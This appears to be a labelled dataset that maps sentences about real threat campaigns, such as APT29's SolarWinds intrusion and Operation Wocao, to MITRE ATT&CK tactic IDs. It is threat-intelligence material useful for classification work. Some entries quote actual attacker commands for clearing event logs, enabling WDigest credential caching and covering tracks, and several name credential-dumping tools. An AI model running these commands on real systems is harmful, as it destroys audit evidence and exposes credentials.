"For Operation Dust Storm, the threat actors used UPX to pack some payloads.",['TA0005:Defense Evasion']
"During Operation Dust Storm, the threat actors sent spearphishing emails that contained a malicious Microsoft Word document.",['TA0001:Initial Access']
"During Operation Dust Storm, the threat actors sent spearphishing emails containing a malicious link.",['TA0001:Initial Access']
"During Operation Dust Storm, the threat actors used Visual Basic scripts.",['TA0002:Execution']
"For Operation Ghost, APT29 used social media platforms to hide communications to C2 servers.",['TA0011:Command and Control']
"For Operation Ghost, APT29 used stolen administrator credentials for lateral movement on compromised networks.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"For Operation Ghost, APT29 registered domains for use in C2 including some crafted to appear as existing legitimate domains.",['TA0042:Resource Development']
"For Operation Ghost, APT29 used new strains of malware including FatDuke, MiniDuke, RegDuke, and PolyglotDuke.",['TA0042:Resource Development']
"For Operation Ghost, APT29 registered Twitter accounts to host C2 nodes.",['TA0042:Resource Development']
"During Operation Ghost, APT29 used steganography to hide payloads inside valid images.",['TA0005:Defense Evasion']
"During Operation Ghost, APT29 used steganography to hide the communications between the implants and their C&C servers.",['TA0011:Command and Control']
"During Operation Ghost, APT29 used WMI event subscriptions to establish persistence for malware.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Operation Honeybee, the threat actors uses zip to pack collected files before exfiltration.",['TA0009:Collection']
"During Operation Honeybee, the threat actors used the malicious NTWDBLIB.DLL and `cliconfig.exe` to bypass UAC protections.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"During Operation Honeybee, the threat actors deployed the MaoCheng dropper with a stolen Adobe Systems digital signature.",['TA0005:Defense Evasion']
"During Operation Honeybee, the threat actors collected data from compromised hosts.",['TA0009:Collection']
"During Operation Honeybee, malicious files were decoded prior to execution.",['TA0005:Defense Evasion']
"For Operation Honeybee, the threat actors stole a digital signature from Adobe Systems to use with their MaoCheng dropper.",['TA0042:Resource Development']
"During Operation Honeybee, threat actors registered domains for C2.",['TA0042:Resource Development']
"During Operation Honeybee, attackers created email addresses to register for a free account for a control server used for the implants.",['TA0042:Resource Development']
"During Operation Honeybee, the threat actors used Base64 to encode files with a custom key.",['TA0005:Defense Evasion']
"During Operation Honeybee, the threat actors uploaded stolen files to their C2 servers.",['TA0010:Exfiltration']
"During Operation Honeybee, the threat actors used batch files that reduced their fingerprint on a compromised system by deleting malware-related files.",['TA0005:Defense Evasion']
"During Operation Honeybee, the threat actors had the ability to use FTP for C2.",['TA0011:Command and Control']
"During Operation Honeybee, the threat actors used a malicious DLL to search for files with specific keywords.",['TA0007:Discovery']
"During Operation Honeybee, the threat actors downloaded additional malware and malicious scripts onto a compromised host.",['TA0011:Command and Control']
"During Operation Honeybee, stolen data was copied into a text file using the format `From .txt` prior to compression, encoding, and exfiltration.",['TA0009:Collection']
"During Operation Honeybee, threat actors relied on a victim to enable macros within a malicious Word document.",['TA0002:Execution']
"During Operation Honeybee, the threat actors modified the MaoCheng dropper so its icon appeared as a Word document.",['TA0005:Defense Evasion']
"During Operation Honeybee, the threat actors used a legitimate Windows executable and secure directory for their payloads to bypass UAC.",['TA0005:Defense Evasion']
"During Operation Honeybee, the threat actors used batch files that modified registry keys.",['TA0005:Defense Evasion']
"During Operation Honeybee, the threat actors deployed malware that used API calls, including `CreateProcessAsUser`.",['TA0002:Execution']
"During Operation Honeybee, the threat actors obtained a list of running processes on a victim machine using `cmd /c tasklist > %temp%\temp.ini`.",['TA0007:Discovery']
"For Operation Honeybee, at least one identified persona was used to register for a free account for a control server.",['TA0042:Resource Development']
"During Operation Honeybee, threat actors ran sc start to start the COMSysApp as part of the service hijacking and sc stop to stop and reconfigure the COMSysApp.",['TA0002:Execution']
"During Operation Honeybee, the threat actors used a batch file that modified the COMSysApp service to load a malicious ipnet.dll payload and to load a DLL into the `svchost.exe` process.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Operation Honeybee, the threat actors collected the computer name, OS, and other system information using `cmd /c systeminfo > %temp%\ temp.ini`.",['TA0007:Discovery']
"For Operation Honeybee, the threat actors used a Visual Basic script embedded within a Word document to download an implant.",['TA0002:Execution']
"During Operation Honeybee, various implants used batch scripting and `cmd.exe` for execution.",['TA0002:Execution']
"During Operation Honeybee, threat actors installed DLLs and backdoors as Windows services.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Operation Sharpshooter, threat actors sent malicious Word OLE documents to victims.",['TA0002:Execution']
"During Operation Sharpshooter, additional payloads were downloaded after a target was infected with a first-stage downloader.",['TA0011:Command and Control']
"During Operation Sharpshooter, the threat actors relied on victims executing malicious Microsoft Word or PDF files.",['TA0002:Execution']
"For Operation Sharpshooter, the threat actors used the Rising Sun modular backdoor.",['TA0042:Resource Development']
"During Operation Sharpshooter, threat actors installed Rising Sun in the Startup folder and disguised it as `mssync.exe`.",['TA0005:Defense Evasion']
"During Operation Sharpshooter, the first stage downloader resolved various Windows libraries and APIs, including `LoadLibraryA`, `GetProcAddress`, and `CreateProcessA`.",['TA0002:Execution']
"During Operation Sharpshooter, threat actors leveraged embedded shellcode to inject a downloader into the memory of Word.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"For Operation Sharpshooter, the threat actors used the ExpressVPN service to hide their location.",['TA0011:Command and Control']
"During Operation Sharpshooter, a first-stage downloader installed Rising Sun to `%Startup%\mssync.exe` on a compromised host.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"For Operation Sharpshooter, the threat actors compromised a server they used as part of the campaign's infrastructure.",['TA0042:Resource Development']
"For Operation Sharpshooter, the threat actors staged malicious files on Dropbox and other websites.",['TA0042:Resource Development']
"During Operation Sharpshooter, the threat actors used a VBA macro to execute a simple downloader that installed Rising Sun.",['TA0002:Execution']
"For Operation Sharpshooter, the threat actors used Dropbox to host lure documents and their first-stage downloader.",['TA0042:Resource Development']
"For Operation Spalax, the threat actors used Nullsoft Scriptable Install System scripts to install malware.",['TA0002:Execution']
"For Operation Spalax, the threat actors used a variety of packers and droppers to decrypt malicious payloads.",['TA0005:Defense Evasion']
"For Operation Spalax, the threat actors registered hundreds of domains using Duck DNS and DNS Exit.",['TA0042:Resource Development']
"For Operation Spalax, the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure.",['TA0011:Command and Control']
"For Operation Spalax, the threat actors used XOR-encrypted payloads.",['TA0005:Defense Evasion']
"During Operation Spalax, the threat actors relied on a victim to open a PDF document and click on an embedded malicious link to download malware.",['TA0002:Execution']
"During Operation Spalax, the threat actors relied on a victim to click on a malicious link distributed via phishing emails.",['TA0002:Execution']
"For Operation Spalax, the threat actors obtained malware, including Remcos, njRAT, and AsyncRAT.",['TA0042:Resource Development']
"During Operation Spalax, the threat actors used `rundll32.exe` to execute malicious installers.",['TA0005:Defense Evasion']
"For Operation Spalax, the threat actors used a variety of packers, including CyaX, to obfuscate malicious executables.",['TA0005:Defense Evasion']
"During Operation Spalax, the threat actors sent phishing emails that included a PDF document that in some cases led to the download and execution of malware.",['TA0001:Initial Access']
"During Operation Spalax, the threat actors sent phishing emails to victims that contained a malicious link.",['TA0001:Initial Access']
"For Operation Spalax, the threat actors used packers that read pixel data from images contained in PE files' resource sections and build the next layer of execution from the data.",['TA0005:Defense Evasion']
"For Operation Spalax, the threat actors obtained packers such as CyaX.",['TA0042:Resource Development']
"For Operation Spalax, the threat actors staged malware and malicious files in legitimate hosting services such as OneDrive or MediaFire.",['TA0042:Resource Development']
"During Operation Spalax, the threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"During Operation Spalax, the threat actors used OneDrive and MediaFire to host payloads.",['TA0011:Command and Control']
"During Operation Wocao, threat actors archived collected files with WinRAR, prior to exfiltration.",['TA0009:Collection']
"During Operation Wocao, threat actors' proxy implementation ""Agent"" upgraded the socket in use to a TLS socket.",['TA0011:Command and Control']
"During Operation Wocao, threat actors used a script to collect information about the infected system.",['TA0009:Collection']
"During Operation Wocao, the threat actors deleted all Windows system and security event logs using `/Q /c wevtutil cl system` and `/Q /c wevtutil cl security`.",['TA0005:Defense Evasion']
"During Operation Wocao, threat actors collected clipboard data in plaintext.",['TA0009:Collection']
"During Operation Wocao, threat actors executed PowerShell commands which were encoded or compressed using Base64, zlib, and XOR.",['TA0005:Defense Evasion']
"During Operation Wocao, threat actors used Mimikatz's DCSync to dump credentials from the memory of the targeted system.",['TA0006:Credential Access']
"During Operation Wocao, threat actors encrypted IP addresses used for ""Agent"" proxy hops with RC4.",['TA0011:Command and Control']
"During Operation Wocao, threat actors exfiltrated files and directories of interest from the targeted system.",['TA0009:Collection']
"During Operation Wocao, threat actors used PowerShell to add and delete rules in the Windows firewall.",['TA0005:Defense Evasion']
"During Operation Wocao, threat actors used the `net` command to retrieve information about domain accounts.",['TA0007:Discovery']
"During Operation Wocao, threat actors used domain credentials, including domain admin, for lateral movement and privilege escalation.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"For Operation Wocao, the threat actors registered email accounts to use during the campaign.",['TA0042:Resource Development']
"During Operation Wocao, threat actors used the XServer backdoor to exfiltrate data.",['TA0010:Exfiltration']
"During Operation Wocao, threat actors gained initial access by exploiting vulnerabilities in JBoss webservers.",['TA0001:Initial Access']
"During Operation Wocao, threat actors used stolen credentials to connect to the victim's network via VPN.","['TA0001:Initial Access', 'TA0003:Persistence']"
"During Operation Wocao, the threat actors consistently removed traces of their activity by first overwriting a file using `/c cd /d c:\windows\temp\ & copy \\\c$\windows\system32\devmgr.dll \\\c$\windows\temp\LMAKSW.ps1 /y` and then deleting the overwritten file using `/c cd /d c:\windows\temp\ & del \\\c$\windows\temp\LMAKSW.ps1`.",['TA0005:Defense Evasion']
"During Operation Wocao, threat actors gathered a recursive directory listing to find files and directories of interest.",['TA0007:Discovery']
"During Operation Wocao, threat actors targeted people based on their organizational roles and privileges.",['TA0043:Reconnaissance']
"During Operation Wocao, threat actors edited variable names within the Impacket suite to avoid automated detection.",['TA0005:Defense Evasion']
"During Operation Wocao, threat actors downloaded additional files to the infected system.",['TA0011:Command and Control']
"During Operation Wocao, threat actors proxied traffic through multiple infected systems.",['TA0011:Command and Control']
"During Operation Wocao, threat actors used a Visual Basic script that checked for internet connectivity.",['TA0007:Discovery']
"During Operation Wocao, threat actors used PowerSploit's `Invoke-Kerberoast` module to request encrypted service tickets and bruteforce the passwords of Windows service accounts offline.",['TA0006:Credential Access']
"During Operation Wocao, threat actors obtained the password for the victim's password manager via a custom keylogger.","['TA0009:Collection', 'TA0006:Credential Access']"
"During Operation Wocao, threat actors used ProcDump to dump credentials from memory.",['TA0006:Credential Access']
"During Operation Wocao, threat actors used SMB to copy files to and from target systems.",['TA0008:Lateral Movement']
"During Operation Wocao, threat actors used local account credentials found during the intrusion for lateral movement and privilege escalation.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Operation Wocao, threat actors staged archived files in a temporary directory prior to exfiltration.",['TA0009:Collection']
"During Operation Wocao, threat actors used the command `net localgroup administrators` to list all administrators part of a local group.",['TA0007:Discovery']
"During Operation Wocao, threat actors developed their own custom webshells to upload to compromised servers.",['TA0042:Resource Development']
"During Operation Wocao, the threat actors renamed some tools and executables to appear as legitimate programs.",['TA0005:Defense Evasion']
"During Operation Wocao, the threat actors enabled Wdigest by changing the `HKLM\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\WDigest` registry value from 0 to 1 .",['TA0005:Defense Evasion']
"During Operation Wocao, threat actors used a custom collection method to intercept two-factor authentication soft tokens.",['TA0006:Credential Access']
"During Operation Wocao, threat actors executed commands through the installed web shell via Tor exit nodes.",['TA0011:Command and Control']
"During Operation Wocao, threat actors used the `CreateProcessA` and `ShellExecute` API functions to launch commands after being injected into a selected process.",['TA0002:Execution']
"During Operation Wocao, threat actors scanned for open ports and used nbtscan to find NETBIOS nameservers.",['TA0007:Discovery']
"During Operation Wocao, threat actors discovered network disks mounted to the system using netstat.",['TA0007:Discovery']
"During Operation Wocao, threat actors used a custom protocol for command and control.",['TA0011:Command and Control']
"During Operation Wocao, the threat actors used uncommon high ports for its backdoor C2, including ports 25667 and 47000.",['TA0011:Command and Control']
"During Operation Wocao, threat actors accessed and collected credentials from password managers.",['TA0006:Credential Access']
"During Operation Wocao, threat actors discovered removable disks attached to a system.",['TA0007:Discovery']
"During Operation Wocao, threat actors used PowerShell on compromised systems.",['TA0002:Execution']
"During Operation Wocao, threat actors used Mimikatz to dump certificates and private keys from the Windows certificate store.",['TA0006:Credential Access']
"During Operation Wocao, the threat actors used `tasklist` to collect a list of running processes on an infected system.",['TA0007:Discovery']
"During Operation Wocao, threat actors injected code into a selected process, which in turn launches a command as a child process of the original.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"During Operation Wocao, threat actors used a custom proxy tool called ""Agent"" which has support for multiple hops.",['TA0011:Command and Control']
"During Operation Wocao, threat actors' backdoors were written in Python and compiled with py2exe.",['TA0002:Execution']
"During Operation Wocao, the threat actors executed `/c cd /d c:\windows\temp\ & reg query HKEY_CURRENT_USER\Software\\PuTTY\Sessions\` to detect recent PuTTY sessions, likely to further lateral movement.",['TA0007:Discovery']
"During Operation Wocao, threat actors used `nbtscan` and `ping` to discover remote systems, as well as `dsquery subnet` on a domain controller to retrieve all subnets in the Active Directory.",['TA0007:Discovery']
"During Operation Wocao, threat actors used Impacket's smbexec.py as well as accessing the C$ and IPC$ shares to move laterally.",['TA0008:Lateral Movement']
"During Operation Wocao, threat actors used scheduled tasks to execute malicious PowerShell code on remote systems.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Operation Wocao, threat actors used scripts to detect security software.",['TA0007:Discovery']
"For Operation Wocao, the threat actors purchased servers with Bitcoin to use during the operation.",['TA0042:Resource Development']
"During Operation Wocao, threat actors created services on remote systems for execution purposes.",['TA0002:Execution']
"During Operation Wocao, threat actors collected a list of installed software on the infected system.",['TA0007:Discovery']
"During Operation Wocao, threat actors discovered the local disks attached to the system and their hardware information including manufacturer and model, as well as the OS versions of systems connected to a targeted network.",['TA0007:Discovery']
"During Operation Wocao, threat actors discovered the local network configuration with `ipconfig`.",['TA0007:Discovery']
"During Operation Wocao, threat actors collected a list of open connections on the infected system using `netstat` and checks whether it has an internet connection.",['TA0007:Discovery']
"During Operation Wocao, threat actors enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system.",['TA0007:Discovery']
"During Operation Wocao, threat actors used the `tasklist` command to search for one of its backdoors.",['TA0007:Discovery']
"During Operation Wocao, threat actors used the `time` command to retrieve the current time of a compromised system.",['TA0007:Discovery']
"For Operation Wocao, the threat actors obtained a variety of open source tools, including JexBoss, KeeThief, and BloodHound.",['TA0042:Resource Development']
"During Operation Wocao, threat actors used valid VPN credentials to gain initial access.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Operation Wocao, threat actors used VBScript to conduct reconnaissance on targeted systems.",['TA0002:Execution']
"During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS.",['TA0011:Command and Control']
"During Operation Wocao, threat actors used their own web shells, as well as those previously placed on target systems by other threat actors, for reconnaissance and lateral movement.",['TA0003:Persistence']
"During Operation Wocao, threat actors spawned a new `cmd.exe` process to execute commands.",['TA0002:Execution']
"During Operation Wocao, threat actors has used WMI to execute commands.",['TA0002:Execution']
"Pikabot Distribution February 2024 utilized a tampered legitimate executable, `grepWinNP3.exe`, for its first stage Pikabot loader, modifying the open-source tool to execute malicious code when launched.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pikabot Distribution February 2024 utilized obfuscated JavaScript files for initial Pikabot payload download.,['TA0002:Execution']
Pikabot Distribution February 2024 passed execution from obfuscated JavaScript files to PowerShell scripts to download and install Pikabot.,['TA0002:Execution']
Pikabot Distribution February 2024 utilized emails with hyperlinks leading to malicious ZIP archive files containing scripts to download and install Pikabot.,['TA0001:Initial Access']
"During the SolarWinds Compromise, APT29 obtained a list of users and their roles from an Exchange server using `Get-ManagementRoleAssignment`.",['TA0007:Discovery']
"During the SolarWinds Compromise, APT29 added credentials to OAuth Applications and Service Principals.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the SolarWinds Compromise, APT29 granted `company administrator` privileges to a newly created service principle.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the SolarWinds Compromise, APT29 added their own devices as allowed IDs for active sync using `Set-CASMailbox`, allowing it to obtain copies of victim mailboxes. It also added additional permissions to compromised Application or Service Principals.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the SolarWinds Compromise, APT29 used compromised service principals to make changes to the Office 365 environment.","['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
"During the SolarWinds Compromise, APT29 used 7-Zip to compress stolen emails into password-protected archives prior to exfltration; APT29 also compressed text files into zipped archives.",['TA0009:Collection']
"During the SolarWinds Compromise, APT29 removed evidence of email export requests using `Remove-MailboxExportRequest`.",['TA0005:Defense Evasion']
"During the SolarWinds Compromise, APT29 used a compromised O365 administrator account to create a new Service Principal.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the SolarWinds Compromise, APT29 downloaded source code from code repositories.",['TA0009:Collection']
"During the SolarWinds Compromise, APT29 was able to get SUNBURST signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle.",['TA0005:Defense Evasion']
"During the SolarWinds Compromise, APT29 gained initial network access to some victims via a trojanized update of SolarWinds Orion software.",['TA0001:Initial Access']
"For the SolarWinds Compromise, APT29 conducted credential theft operations to obtain credentials to be used for access to victim environments.",['TA0043:Reconnaissance']
"During the SolarWinds Compromise, APT29 used account credentials they obtained to attempt access to Group Managed Service Account passwords.",['TA0006:Credential Access']
"During the SolarWinds Compromise, APT29 stole users' saved passwords from Chrome.",['TA0006:Credential Access']
"During the SolarWinds Compromise, APT29 used privileged accounts to replicate directory service data with domain controllers.",['TA0006:Credential Access']
"During the SolarWinds Compromise, APT29 accessed victims' internal knowledge repositories to view sensitive corporate information on products, services, and internal business operations.",['TA0009:Collection']
"During the SolarWinds Compromise, APT29 extracted files from compromised networks.",['TA0009:Collection']
"During the SolarWinds Compromise, APT29 used 7-Zip to decode their Raindrop malware.",['TA0005:Defense Evasion']
"During the SolarWinds Compromise, APT29 registered devices in order to enable mailbox syncing via the `Set-CASMailbox` command.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the SolarWinds Compromise, APT29, used `AUDITPOL` to prevent the collection of audit logs.",['TA0005:Defense Evasion']
"During the SolarWinds Compromise, APT29 used `netsh` to configure firewall rules that limited certain UDP outbound packets.",['TA0005:Defense Evasion']
"During the SolarWinds Compromise, APT29 used the service control manager on a remote system to disable services associated with security monitoring products.",['TA0005:Defense Evasion']
"During the SolarWinds Compromise, APT29 used PowerShell to discover domain accounts by exectuing `Get-ADUser` and `Get-ADGroupMember`.",['TA0007:Discovery']
"During the SolarWinds Compromise, APT29 used domain administrators' accounts to help facilitate lateral movement on compromised networks.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the SolarWinds Compromise, APT29 used AdFind to enumerate domain groups.",['TA0007:Discovery']
"During the SolarWinds Compromise, APT29 used the `Get-AcceptedDomain` PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell. They also used AdFind to enumerate domains and to discover trust between federated domains.",['TA0007:Discovery']
"For the SolarWinds Compromise, APT29 acquired C2 domains, sometimes through resellers.",['TA0042:Resource Development']
"For the SolarWinds Compromise, APT29 compromised domains to use for C2.",['TA0042:Resource Development']
"During the SolarWinds Compromise, APT29 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.",['TA0011:Command and Control']
"During the SolarWinds Compromise, APT29 exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.",['TA0010:Exfiltration']
"During the SolarWinds Compromise, APT29 exploited CVE-2020-0688 against the Microsoft Exchange Control Panel to regain access to a network.",['TA0001:Initial Access']
"For the SolarWinds Compromise, APT29 used compromised identities to access networks via SSH, VPNs, and other remote access tools.","['TA0001:Initial Access', 'TA0003:Persistence']"
"During the SolarWinds Compromise, APT29 routinely removed their tools, including custom backdoors, once remote access was achieved.",['TA0005:Defense Evasion']
"During the SolarWinds Compromise, APT29 obtained information about the configured Exchange virtual directory using `Get-WebServicesVirtualDirectory`.",['TA0007:Discovery']
"During the SolarWinds Compromise, APT29 set the hostnames of their C2 infrastructure to match legitimate hostnames in the victim environment. They also used IP addresses originating from the same country as the victim for their VPN infrastructure.",['TA0011:Command and Control']
"During the SolarWinds Compromise, APT29 temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file.",['TA0005:Defense Evasion']
"During the SolarWinds Compromise, APT29 downloaded additional malware, such as TEARDROP and Cobalt Strike, onto a compromised host following initial access.",['TA0011:Command and Control']
"During the SolarWinds Compromise, APT29 used SSH port forwarding capabilities on public-facing systems, and configured at least one instance of Cobalt Strike to use a network pipe over SMB.",['TA0011:Command and Control']
"During the SolarWinds Compromise, APT29 used GoldFinder to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through.",['TA0007:Discovery']
"During the SolarWinds Compromise, APT29 obtained Ticket Granting Service tickets for Active Directory Service Principle Names to crack offline.",['TA0006:Credential Access']
"During the SolarWinds Compromise, APT29 used compromised local accounts to access victims' networks.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"For the SolarWinds Compromise, APT29 used numerous pieces of malware that were likely developed for or by the group, including SUNBURST, SUNSPOT, Raindrop, and TEARDROP.",['TA0042:Resource Development']
"During the SolarWinds Compromise, APT29 named tasks `\Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager` in order to appear legitimate.",['TA0005:Defense Evasion']
"During the SolarWinds Compromise, APT29 renamed software and DLLs with legitimate names to appear benign.",['TA0005:Defense Evasion']
"During the SolarWinds Compromise, APT29 used the `Get-ManagementRoleAssignment` PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.",['TA0007:Discovery']
"During the SolarWinds Compromise, APT29 used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and execute other commands.",['TA0002:Execution']
"During the SolarWinds Compromise, APT29 obtained PKI keys, certificate files, and the private encryption key from an Active Directory Federation Services container to decrypt corresponding SAML signing certificates.",['TA0006:Credential Access']
"During the SolarWinds Compromise, APT29 used multiple command-line utilities to enumerate running processes.",['TA0007:Discovery']
"During the SolarWinds Compromise, APT29 staged data and files in password-protected archives on a victim's OWA server.",['TA0009:Collection']
"During the SolarWinds Compromise, APT29 used RDP sessions from public-facing systems to internal servers.",['TA0008:Lateral Movement']
"During the SolarWinds Compromise, APT29 collected emails from specific individuals, such as executives and IT staff, using `New-MailboxExportRequest` followed by `Get-MailboxExportRequest`.",['TA0009:Collection']
"During the SolarWinds Compromise, APT29 used AdFind to enumerate remote systems.",['TA0007:Discovery']
"During the SolarWinds Compromise, APT29 used `Rundll32.exe` to execute payloads.",['TA0005:Defense Evasion']
"During the SolarWinds Compromise, APT29 created tokens using compromised SAML signing certificates.",['TA0006:Credential Access']
"During the SolarWinds Compromise, APT29 used administrative accounts to connect over SMB to targeted users.",['TA0008:Lateral Movement']
"During the SolarWinds Compromise, APT29 used `scheduler` and `schtasks` to create new tasks on remote host as part of their lateral movement. They manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration. APT29 also created a scheduled task to maintain SUNSPOT persistence when the host booted.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the SolarWinds Compromise, APT29 stole Chrome browser cookies by copying the Chrome profile directories of targeted users.",['TA0006:Credential Access']
"During the SolarWinds Compromise, APT29 used `fsutil` to check available free space before executing actions that might create large files on disk.",['TA0007:Discovery']
"During the SolarWinds Compromise, APT29 modified timestamps of backdoors to match legitimate Windows files.",['TA0005:Defense Evasion']
"During the SolarWinds Compromise, APT29 changed domain federation trust settings using Azure AD administrative permissions to configure the domain to accept authorization tokens signed by their own SAML signing certificate.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"During the SolarWinds Compromise, APT29 gained access through compromised accounts at cloud solution partners, and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems.",['TA0001:Initial Access']
"During the SolarWinds Compromise, APT29 used forged SAML tokens that allowed the actors to impersonate users and bypass MFA, enabling APT29 to access enterprise cloud applications and services.","['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
"During the SolarWinds Compromise, APT29 used different compromised credentials for remote access and to move laterally.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"For the SolarWinds Compromise, APT29 wrote malware such as Sibot in Visual Basic.",['TA0002:Execution']
"During the SolarWinds Compromise, APT29 bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key.",['TA0006:Credential Access']
"During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration.",['TA0011:Command and Control']
"During the SolarWinds Compromise, APT29 used stolen cookies to access cloud resources and a forged `duo-sid` cookie to bypass MFA set on an email account.","['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
"During the SolarWinds Compromise, APT29 used `cmd.exe` to execute commands on remote machines.",['TA0002:Execution']
"During the SolarWinds Compromise, APT29 used WMI for the remote execution of files for lateral movement.",['TA0002:Execution']
"During the SolarWinds Compromise, APT29 used a WMI event filter to invoke a command-line event consumer at system boot time to launch a backdoor with `rundll32.exe`.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the SolarWinds Compromise, APT29 used WinRM via PowerShell to execute commands and payloads on remote hosts.",['TA0008:Lateral Movement']
"In the Triton Safety Instrumented System Attack, TEMP.Veles engaged in network reconnaissance against targets of interest.",['TA0043:Reconnaissance']
"In the Triton Safety Instrumented System Attack, TEMP.Veles used cryptcat binaries to encrypt their traffic.",['TA0011:Command and Control']
"In the Triton Safety Instrumented System Attack, TEMP.Veles modified files based on the open-source project cryptcat in an apparent attempt to decrease anti-virus detection rates.",['TA0005:Defense Evasion']
"In the Triton Safety Instrumented System Attack, TEMP.Veles used Mimikatz.",['TA0006:Credential Access']
"In the Triton Safety Instrumented System Attack, TEMP.Veles developed, prior to the attack, malware capabilities that would require access to specific and specialized hardware and software.",['TA0042:Resource Development']
"In the Triton Safety Instrumented System Attack, TEMP.Veles renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files.",['TA0005:Defense Evasion']
"In the Triton Safety Instrumented System Attack, TEMP.Veles used a publicly available PowerShell-based tool, WMImplant.",['TA0002:Execution']
"In the Triton Safety Instrumented System Attack, TEMP.Veles installed scheduled tasks defined in XML files.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"In the Triton Safety Instrumented System Attack, TEMP.Veles used tools such as Mimikatz and other open-source software.",['TA0042:Resource Development']
"In the Triton Safety Instrumented System Attack, TEMP.Veles captured credentials as they were being changed by redirecting text-based login codes to websites they controlled.","['TA0009:Collection', 'TA0006:Credential Access']"
Versa Director Zero Day Exploitation used HTTPS for command and control of compromised Versa Director servers.,['TA0011:Command and Control']
"Versa Director Zero Day Exploitation involved exploitation of a vulnerability in Versa Director servers, since identified as CVE-2024-39717, for initial access and code execution.",['TA0001:Initial Access']
Versa Director Zero Day Exploitation intercepted and harvested credentials from user logins to compromised devices.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Versa Director Zero Day Exploitation involved the development of a new web shell variant, VersaMem.",['TA0042:Resource Development']
Versa Director Zero Day Exploitation used compromised small office/home office devices to interact with vulnerable Versa Director servers.,['TA0042:Resource Development']
Versa Director Zero Day Exploitation used a non-standard TCP session to initialize communication prior to establishing HTTPS command and control.,['TA0011:Command and Control']
Versa Director Zero Day Exploitation established HTTPS communications from adversary-controlled SOHO devices over port 443 with compromised Versa Director servers.,['TA0011:Command and Control']
Versa Director Zero Day Exploitation resulted in the deployment of the VersaMem web shell for follow-on activity.,['TA0003:Persistence']
Water Curupira Pikabot Distribution used highly obfuscated JavaScript files as one initial installer for Pikabot.,['TA0005:Defense Evasion']
Water Curupira Pikabot Distribution utilizes thread spoofing of existing email threads in order to execute spear phishing operations.,['TA0043:Reconnaissance']
"Water Curupira Pikabot Distribution used Curl.exe to download the Pikabot payload from an external server, saving the file to the victim machine's temporary directory.",['TA0011:Command and Control']
Water Curupira Pikabot Distribution initial delivery included obfuscated JavaScript objects stored in password-protected ZIP archives.,['TA0002:Execution']
"Water Curupira Pikabot Distribution delivered Pikabot installers as password-protected ZIP files containing heavily obfuscated JavaScript, or IMG files containing an LNK mimicking a Word document and a malicious DLL.",['TA0002:Execution']
Water Curupira Pikabot Distribution distributed a PDF attachment containing a malicious link to a Pikabot installer.,['TA0002:Execution']
"Water Curupira Pikabot Distribution utilizes rundll32.exe to execute the final Pikabot payload, using the named exports `Crash` or `Limit` depending on the variant.",['TA0005:Defense Evasion']
Water Curupira Pikabot Distribution attached password-protected ZIP archives to deliver Pikabot installers.,['TA0001:Initial Access']
Water Curupira Pikabot Distribution requires users to interact with malicious attachments in order to start Pikabot installation.,['TA0002:Execution']
Water Curupira Pikabot Distribution installation via JavaScript will launch follow-on commands via cmd.exe.,['TA0002:Execution']
APT-C-36 has downloaded binary data from a specified domain after the malicious document is opened.,['TA0011:Command and Control']
